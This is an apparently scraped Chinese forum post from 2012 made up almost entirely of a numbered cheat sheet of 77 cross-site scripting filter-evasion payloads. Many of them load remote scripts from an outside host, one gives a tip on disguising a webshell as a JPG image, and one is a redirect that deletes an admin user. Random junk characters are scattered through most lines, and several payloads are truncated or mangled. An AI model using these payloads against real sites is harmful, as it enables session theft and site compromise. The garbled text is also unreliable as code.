跨站图片shell C' L* M1 s' X& e+ c% d3 s
XSS跨站代码 <script>alert("")</script>" `& S: h0 T2 S1 i
! _6 J% p* H2 X$ R
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马( N( U, c0 S. ?1 x
" s9 ?9 _1 k$ z" J1 O/ t0 q( {. A; ?
* C# w7 X( c! j& V, S- F, O) J) Z1)普通的XSS JavaScript注入# _7 W" O% G4 Z: _3 @0 `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ L# G% u. b" u
! n& x! Y3 n. Q9 v* @
(2)IMG标签XSS使用JavaScript命令5 g: _! G) u9 C6 w+ f- x' A
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 F/ ^- W# ~% E' w( I& Y! T# b# |2 d( k& l5 l% _; m" R0 N% N5 d
(3)IMG标签无分号无引号
- ]* I' ]# n) Z$ V<IMG SRC=javascript:alert(‘XSS’)>4 Y! e. P4 d% g: G$ S9 p' b. S
9 s+ g. m- m: u1 Y, n+ d(4)IMG标签大小写不敏感; {) O) s# Y$ l7 H8 i9 X) C2 T; [7 g
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>8 y" _/ ?5 D3 @, {! l: [5 y
) {9 q; |" ]& k1 S8 @(5)HTML编码(必须有分号)) D- X: t* t6 d2 l1 I, M k' `
<IMG SRC=javascript:alert(“XSS”)>
' f# g% m9 A# }5 x0 m7 B- F8 |: B _. D1 r6 }
(6)修正缺陷IMG标签
' \6 \ M( C- A) N<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ C! u1 |, b) K
" X! k- ~% {) Q7 ?! V( J0 J(7)formCharCode标签(计算器)& @* ~: A& d2 ]" N0 O
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> F& d& l8 R* _: d0 p
, b7 r0 b5 z0 Q6 M(8)UTF-8的Unicode编码(计算器)" N4 i, U. \: ^) f4 ]7 \, E/ V
<IMG SRC=jav..省略..S')>6 u- s4 S: c6 Z: h
. N4 M( m, Q$ C1 ^1 p4 p( U(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 K& f# {( ~: r; c* E% P. i( W; j<IMG SRC=jav..省略..S')>
& N' d6 Z M. k$ h8 q* M1 Y
' @$ U: P+ l$ K8 G5 F(10)十六进制编码也是没有分号(计算器)
. K1 w- h8 l- t8 u$ e<IMG SRC=java..省略..XSS')>+ J( {, I0 D- ~, c. k4 v
, E( D" g+ E* s3 n
(11)嵌入式标签,将Javascript分开
- ^( J( x6 a2 x/ L) P5 K2 `<IMG SRC=”jav ascript:alert(‘XSS’);”>& }, Z0 u4 a9 z2 C1 Y L
) `1 q! z% s% ^# @4 \3 v4 S1 _# |$ p8 v(12)嵌入式编码标签,将Javascript分开7 U: x! h8 e% B+ ~4 _/ b
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 ^; t7 o/ G- x% p, p2 Z- n, N" }
(13)嵌入式换行符2 E( | k& ]7 C6 \
<IMG SRC=”jav ascript:alert(‘XSS’);”>( A3 ]0 g9 H) R
" I2 M2 t; y' v" y
(14)嵌入式回车
: I# ], @2 o3 _6 {$ `<IMG SRC=”jav ascript:alert(‘XSS’);”>1 x: m4 e* j. Q3 w- q+ ]
# d( Q/ Y$ T: K6 m" \; J% [' Z% D(15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 Z% U& e) Y% O, m% h<IMG SRC=”javascript:alert(‘XSS‘)”>$ w7 {6 x- h4 |
" q# O1 A! w t(16)解决限制字符(要求同页面)
" l' ?3 U$ y7 G4 r7 q8 K<script>z=’document.’</script>
1 q' x4 V- W& e5 n0 X<script>z=z+’write(“‘</script>* {7 B* b' I. H3 P0 Y
<script>z=z+’<script’</script>
1 O# Y' {( f$ ?9 k' i/ w<script>z=z+’ src=ht’</script>( z& B s: I0 o
<script>z=z+’tp://ww’</script>6 o8 |! O- M2 o; F
<script>z=z+’w.shell’</script>
- ^* e% e+ j- u+ T9 D<script>z=z+’.net/1.’</script>
( f; A$ A0 K1 l' x<script>z=z+’js></sc’</script>
' F4 A$ @4 g! m- K: O$ _<script>z=z+’ript>”)’</script>3 {7 z8 U: Z) F# h3 R4 e! v' g
<script>eval_r(z)</script>
) t/ R+ I, T' A: t4 k, S
0 w& Q H+ V0 e @6 M' S7 c* i) V(17)空字符9 n* T6 o7 ]" S$ C [, i) Q/ S7 A
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 W: Q* V: {, |. O3 p
4 E5 e" I- O& F z/ h
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; n' ?) D' e3 I) j0 o; _2 Q
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ t! {1 | x( x; N2 V- d- y' X
; Z/ e5 U. f9 z! a' c( I
(19)Spaces和meta前的IMG标签6 a) [6 z% e( l
<IMG SRC=” javascript:alert(‘XSS’);”>
4 ?! ^+ H6 _) J" S" ~1 Z; O1 U7 ]. X
(20)Non-alpha-non-digit XSS
: }) B0 y( K3 k h3 f# U% Q<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> C! p5 K7 t# y' B$ R+ n
( J$ `0 K3 k v' U7 G5 c(21)Non-alpha-non-digit XSS to 2
! |: ?7 _ e) ~4 \<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
* h- P" E! Z& R: ~7 D# [. m# v& k' h4 O0 m" ?4 g$ ~3 u
(22)Non-alpha-non-digit XSS to 3
% `* k `2 y3 M<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) K! |$ B) u4 U& t6 i% k2 @7 U" V1 I7 m$ \
(23)双开括号
8 M* \7 Z# [6 b! b, N& s' M, U<<SCRIPT>alert(“XSS”);//<</SCRIPT>
9 f1 a: M. |: _* |, K+ j* D
+ d8 b8 x/ Y# V5 {4 l0 {, I1 \# m' a(24)无结束脚本标记(仅火狐等浏览器)/ C6 @% J1 p9 U$ [' {! o5 o1 ^
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>( @2 p2 y" N* s. z1 _4 s U
. k. ]: I( \, Q( ?3 s" P- p(25)无结束脚本标记2* U) I0 M0 T3 _
<SCRIPT SRC=//3w.org/XSS/xss.js>+ g2 b/ P1 O; X1 m* s# {& @5 m$ Y, A
( g$ W6 S9 n( V O% P! r(26)半开的HTML/JavaScript XSS
+ ^- x9 i' J. ~, X<IMG SRC=”javascript:alert(‘XSS’)”
) o5 n) V7 ]% N( h' H1 r
* F2 f) s$ r5 f/ @(27)双开角括号
9 P' b. y% U% f- V. D$ B<iframe src=http://3w.org/XSS.html <1 `" `( l' { N6 U( _% q, C: I
5 L6 _0 i% j: R, O& t(28)无单引号 双引号 分号$ f# [: Y0 V( a5 I$ d0 N; \
<SCRIPT>a=/XSS/1 H. ^8 `, k4 N) `: [1 V5 f; \6 n) `
alert(a.source)</SCRIPT>
, ]2 M6 R: i* M- M; D! e, D: }' y$ B" d P# f$ x6 ^ e
(29)换码过滤的JavaScript
+ _) b, `, ] ^3 ^2 W( U% J* o2 Q0 j\”;alert(‘XSS’);//" K& r' O# J$ u, J
8 d* J a, }" y3 f m% ](30)结束Title标签9 k+ k$ n$ c0 Y/ U- `, \
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' m) D+ T% P# S$ H
4 h, r @5 y* B4 Y, d; u(31)Input Image* ~( S6 @$ D/ l) T2 R& q8 m/ y; ~
<INPUT SRC=”javascript:alert(‘XSS’);”># y3 M3 \4 N6 k- C* O: V
( B3 s8 p4 [7 c' ^ A; f(32)BODY Image' t' K6 D( z+ L# x: x
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>" V+ \, C/ Q& g, q& c" L& J1 I
* _$ Y% ]/ B+ j0 j' ~) S$ I; ^
(33)BODY标签; f) e# Y" A7 W9 m
<BODY(‘XSS’)>
% v% m& W$ R6 p! P: x+ A) i0 s! l" e, v7 i/ V% N
(34)IMG Dynsrc- ~. a, x. L+ p
<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 [) O8 s" Z& E. H) s
- }: h! x' @8 ]/ P2 V8 P+ ](35)IMG Lowsrc( Z& j& Z% `6 R# ^% c; Q/ i
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 U" c: s d7 b6 [$ {/ f4 s; `% N1 W0 e) Z2 K, A
(36)BGSOUND
- u0 m; ]( {' y/ e( i& i" O8 W( v<BGSOUND SRC=”javascript:alert(‘XSS’);”>
- H) w9 I! H* [! H# Y0 p
2 s* d4 I7 V, X' g% G' B, `& y(37)STYLE sheet1 U8 q( Y, ] T' s7 S
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 w; {6 ~2 g R0 K- ^# p* I: A* M) n% B3 m& m1 F' Q5 I2 T
(38)远程样式表+ q" J; S5 s! J2 }2 P4 B
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" m- I& d0 o. O8 r7 I
. E8 |8 O- e% {2 x+ J4 X(39)List-style-image(列表式)! T# A8 F( E, X3 B& ]; m! \# p! [
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 _- B# [9 S: L, s& |
6 T& |3 Z* P a& N2 u" K6 W& T
(40)IMG VBscript) Y7 `) G/ ~7 J2 ?$ m5 S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS; ~; j0 l: z/ y3 j
: U1 l ~: d+ S2 P(41)META链接url
. w% \' D& ?: F: L0 b<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 j; F6 N" B/ {4 E5 w' Y
1 O. T9 @8 k. M7 P0 R, S& v. ^3 x(42)Iframe
9 k2 n O5 p- A7 l! R<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>1 Y. I$ l7 w( x1 r
(43)Frame3 h# q- k9 G+ ^2 c. a
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
: I/ a; k0 k: [8 a2 c+ W& D4 e- M4 x7 J; w7 ~* v) i3 \/ ^, ]
(44)Table
( s1 \. Y- c. R4 Y) i, ]' e8 O: ^<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
, @/ [8 J4 T( q; {4 u' K. W! H- t, u( g/ X, d) N' F9 P$ |, \, g0 K& {
(45)TD
4 q* Q `. ]" M$ ?2 q. w<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
: S9 j2 t! j* D. Z0 U+ n- |4 A
' i% C# [" u' Q" E% D. P3 v(46)DIV background-image; w2 k; y% n C( D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& [: a) k/ Z5 e- p- N. ]3 |3 [
- E( X% O. a2 H2 L1 P8 @(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
5 F. M* Q O9 h6 Z<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>8 l) o$ ?- p/ Q% f, a
" g$ j) ~) A; B- o8 ]
(48)DIV expression
4 h4 _( e0 V0 [; |<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 h" P$ O9 A; c
2 V+ d) F1 l4 e6 T(49)STYLE属性分拆表达
( Z$ \5 Z s' a" `$ g @# n<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>8 v& U1 A0 j/ _
. B, [& B+ O* ~" b b(50)匿名STYLE(组成:开角号和一个字母开头)
' G% ?* U) g9 |$ Z! r5 A. Z0 E<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 Q6 H8 R' o- |. k9 i
. o5 {9 L, X) Y9 L h
(51)STYLE background-image
( N3 `; e' D8 k<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>0 o% w3 q) C1 ^* d$ \
6 A8 d$ s5 _8 r. L(52)IMG STYLE方式
( P2 D' N# e7 S0 z/ Y' jexppression(alert(“XSS”))’>- _4 ]) j$ @% Y2 v
/ J) e9 z% c5 y9 b& \ m$ ^(53)STYLE background4 ]# U7 E; S0 i* F
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 k) @0 L! u' X% E1 i8 s( m4 ?8 n# h I( M* Q6 y0 x$ t2 R
(54)BASE1 @) D% ] B5 e$ X( w2 C8 P
<BASE HREF=”javascript:alert(‘XSS’);//”>
) i0 P3 s K" A* j$ j- N4 D$ ?: C) v
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
9 o5 Q7 d8 V g: w9 }- s<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>- b) B' q% b. ?6 `' e, [6 x5 A
5 j5 G' g; d6 U( N
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 o0 W6 R& W% e6 C! N' ta=”get”;: Y. ?3 J7 Z% A+ ~# R& ]
b=”URL(\”";
" X" R* c/ K+ s$ y! q/ y$ G/ l0 ?! Ec=”javascript:”;6 `, a6 j1 m$ `8 W3 g" B
d=”alert(‘XSS’);\”)”;" c! u: N: t, J |# d$ M% u7 J
eval_r(a+b+c+d);
% R+ ^6 _! w1 }" l; I1 [3 x$ D( m5 ?8 S- i( _+ K9 @9 Y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上) D- w) c- A# W0 S4 X. ?9 a( F% b
<HTML xmlns:xss>
$ X1 C1 Z, ~2 x* R5 y# {# P<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
L [2 ]1 F4 p<xss:xss>XSS</xss:xss>
( Q5 w! W' p2 _* M</HTML>& B K l' X. ~3 i8 n4 T
% K9 ]4 r* {1 D' s3 q: N(58)如果过滤了你的JS你可以在图片里添加JS代码来利用 W! q1 j* J2 U4 [ Q
<SCRIPT SRC=””></SCRIPT>
8 u7 ~2 C4 g5 K8 `' c
4 J8 y1 w+ s2 k6 x2 t(59)IMG嵌入式命令,可执行任意命令9 T0 q8 t' z, u7 C7 v
<IMG SRC=”http://www.XXX.com/a.php?a=b”>& C% w0 @7 l% X' n. M
# l5 S! p/ t L9 L: l/ B
(60)IMG嵌入式命令(a.jpg在同服务器); ?4 ]7 k: \! j) c6 [7 P- J; Y
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 L5 O. ?8 a1 q: f+ x
& Z" z6 T/ g0 L) N(61)绕符号过滤: Z3 T* V8 F% l4 R: }
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 Y' c/ t3 x0 w8 M2 {2 V, x9 {* r' A! o9 w
(62)( c4 e1 w& M. ?/ b8 D8 j& U* C
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 C M- ~ I( Y+ N4 j
+ c! k1 C8 @9 c$ }2 v4 r5 H4 [% d
(63)( Z; E3 x9 q$ F) s+ h# |6 s
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 S7 g$ q" `0 @4 n3 r2 D' T, n& w- W8 S" Z E, f: c( t
(64)
6 a4 N0 o; t' c<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
]4 P, D% r' b: d' D7 \/ x& X! F5 ~: U1 k+ c& ?
(65)1 J( r0 W4 U. h, V
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 ^9 U j9 l2 E# [( u
: [6 f, @! _5 i; [; D9 I/ ] @(66)" P, `3 J% ~+ y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& _# k5 H& a+ S( C, c
* ]6 b1 U; `* X% I8 M; d1 Z0 y
(67)
# b+ i% J5 W# [9 Z' ? k% ~( p<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>' c, e2 {" B7 |% h2 M+ G9 C
9 D4 [ C, ?9 j" H- Y9 u$ k4 E' A3 F
(68)URL绕行# R% R3 i& V5 ]$ F/ N4 {. i9 w
<A HREF=”http://127.0.0.1/”>XSS</A>
' N6 g8 E8 u8 ~& J$ h! Z: z; n, e1 S; m1 A# {# m* x) U% ^
(69)URL编码! @" O6 `; t) E& Z0 \( O
<A HREF=”http://3w.org”>XSS</A>
`' i# t& l) X( g/ z* R t/ p ~
( [$ h& `2 f9 O1 y5 D% O' [(70)IP十进制) }3 R5 O5 T# \/ Z9 m7 P
<A HREF=”http://3232235521″>XSS</A>3 R& r/ @4 Z9 S3 ~
4 P% q8 v2 s. Y5 y8 M' p(71)IP十六进制
( [7 D0 _4 v4 [! K$ ^<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>& s' s; g' j- t' R- m6 s
; A1 g8 k& N5 m2 F. q
(72)IP八进制1 N# q) Q/ m& U: \
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
! ]* w& V4 P" l- T5 y
V% a. Y- u$ y# D9 {& N' n(73)混合编码
; e6 A9 m$ T) d1 G<A HREF=”h
6 p0 o2 G0 V( f8 O# K/ ctt p://6 6.000146.0×7.147/”">XSS</A> s: w' V2 F9 ?+ l. r2 A
- [1 Z* v1 W% ^( [* O* j
(74)节省[http:]/ u8 { M$ n! L* D" Y$ D; }* }
<A HREF=”//www.google.com/”>XSS</A>
8 z4 {8 s q& `7 Q X5 ]* T5 U' K, e3 G# K; ]
(75)节省[www]
; L8 H" }& Z0 s* g3 v<A HREF=”http://google.com/”>XSS</A>& ^ K: ?% g: |7 c' A1 l. @- M6 N2 U3 O
# p/ Q; R: B2 }0 S(76)绝对点绝对DNS
7 A( _3 e' {' x! G4 I" n! g) j<A HREF=”http://www.google.com./”>XSS</A>
x! r) U2 e! K7 [5 V% T4 {3 w! L- ~$ w7 d4 D- e) V+ W
(77)javascript链接5 D: z: m3 L X
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
4 b5 e9 K# c) ~% Y6 x |
发表于 2012-9-13 17:04:56
收藏
支持
反对